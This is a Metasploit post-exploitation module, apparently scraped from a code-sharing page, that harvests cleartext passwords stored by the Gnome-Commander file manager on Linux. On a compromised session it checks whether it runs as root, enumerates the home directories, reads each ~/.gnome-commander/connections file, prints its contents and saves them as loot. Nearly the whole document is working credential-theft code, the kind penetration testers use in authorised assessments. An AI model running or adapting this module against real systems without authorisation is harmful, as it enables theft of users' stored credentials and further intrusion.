Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Linux Gather Gnome-Commander Creds',
14
        'Description' => %q{
15
          This module collects the clear text passwords stored by
16
          Gnome-commander, a GUI file explorer for GNOME.  Typically, these
17
          passwords are stored in the user's home directory, at
18
          ~/.gnome-commander/connections.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
22
        'Platform' => %w[linux],
23
        'SessionTypes' => [ 'meterpreter', 'shell']
24
      )
25
    )
26
  end
27

28
  def run
29
    user_dirs = []
30
    # Search current user
31
    user = cmd_exec('whoami').chomp
32
    # User is root
33
    if user == 'root'
34
      print_status("Current user is #{user}, probing all home dirs")
35
      user_dirs << '/root'
36
      # Search home dirs
37
      cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
38
    else
39
      # Non root user
40
      print_status("Current user is #{user}, probing /home/#{user}")
41
      user_dirs << "/home/#{user}"
42
    end
43
    # Try to find connections file in users homes
44
    user_dirs.each do |dir|
45
      # gnome-commander connections file
46
      connections_file = "#{dir}/.gnome-commander/connections"
47
      if file?(connections_file)
48
        # File.exist
49
        begin
50
          str_file = read_file(connections_file)
51
          print_good("File found: #{connections_file}")
52
          vprint_line(str_file)
53
          # Store file
54
          p = store_loot('connections', 'text/plain', session, str_file, connections_file, 'Gnome-Commander connections')
55
          print_good("Connections file saved to #{p}")
56
        rescue EOFError
57
          # If there's nothing in the file, we hit EOFError
58
          print_error("Nothing read from file: #{connections_file}, file may be empty")
59
        end
60
      else
61
        # File not found
62
        vprint_error("File not found: #{connections_file}")
63
      end
64
    end
65
  end
66
end
67

68